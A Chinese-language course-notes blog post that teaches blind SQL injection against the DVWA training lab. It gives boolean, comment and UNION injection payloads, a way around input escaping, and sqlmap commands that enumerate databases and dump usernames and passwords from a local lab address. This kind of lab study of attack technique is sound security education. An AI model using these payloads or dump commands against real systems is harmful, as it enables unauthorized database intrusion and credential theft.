白帽子黑客攻防系列課程(十)SQL注入(盲注)

課程前言

白帽子黑客攻防系列課程第二季現已上線。

本課程僅做學習交流之用,切勿用於任何不法用途!
白帽子黑客攻防系列課程將會深入淺出講解計算機網絡基礎、滲透靶場搭建、Kali Linux、系統漏洞、滲透工具(Nmap、Sqlmap、AWVS等)等的原理及實戰內容。
第二季主要講解DVWA黑客攻防演練等,配合講解網絡基礎知識及Linux基礎知識等。
知其然並知其所以然,相信通過學習,各位朋友對白帽子黑客攻防會有非常深刻理解。
夢想還是要有的,萬一實現了呢!

網易雲課堂地址:https://study.163.com/course/courseMain.htm?courseId=1209505841&share=2&shareId=480000001946405

本篇博文爲SQL盲注要點筆記,主要介紹黑客攻防中的SQL盲注攻防技術。

SQL注入(盲注)概述

SQL盲注是指不能根據報錯和回顯來判斷是否存在SQL注入時,攻擊人員通過提交邏輯條件來觀察響應結果來判斷是否存在SQL注入的方式。

回顯注入與盲注在流程上沒有太多區別,都是先確定注入點,然後進行查庫、查表、查字段等工作,但是盲注並不會有直接的查詢內容顯示效果,因此在利用難度方面盲注要比回顯注入大得多。

初級原理及實操

view source

boolean 型,輸入 1' or '1' = '1

註釋型, 1' or 1=1 #

union 型,比如輸入 ' UNION ALL SELECT NULL, database()#

中級原理及實操

view source

mysql_real_escape_string會對這 5 個字符轉義:

' " \r \n NULL Control-Z

用火狐瀏覽器的查看元素,生成節點副本——編輯html文件——1 or 1=1。

高級原理及實操

view source

實操輸入1' or '1' = '1'#

盲注入侵思路(含sqlmap實操)

手動入侵思路

數據庫的名字:猜數據庫名的長度、用二分法猜數據庫的名字

所有表的名字

表字段名

猜數據

TABLES用戶創建的數據庫的庫名和表名。TABLE_SCHEMATE和TABLE_NAME

一、獲取所有的數據庫

sqlmap -u "http://192.168.199.217/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=p14aho3fltvqed96e969ufplo1; security=low" --dbs

二、獲取 dvwa 所有的表

sqlmap -u "http://192.168.199.217/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=p14aho3fltvqed96e969ufplo1; security=low" -D dvwa --tables

三、獲取users表的所有字段

sqlmap -u "http://192.168.199.217/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=p14aho3fltvqed96e969ufplo1; security=low" -D dvwa -T users --column --threads 10

四、獲取用戶及密碼信息 sqlmap -u "http://192.168.199.217/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=p14aho3fltvqed96e969ufplo1; security=low" -D dvwa -T users -C user,password --dump --threads 10

總結

神仙級原理

sqlmap實操

發佈了92 篇原創文章 · 獲贊 20 · 訪問量 76萬+
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章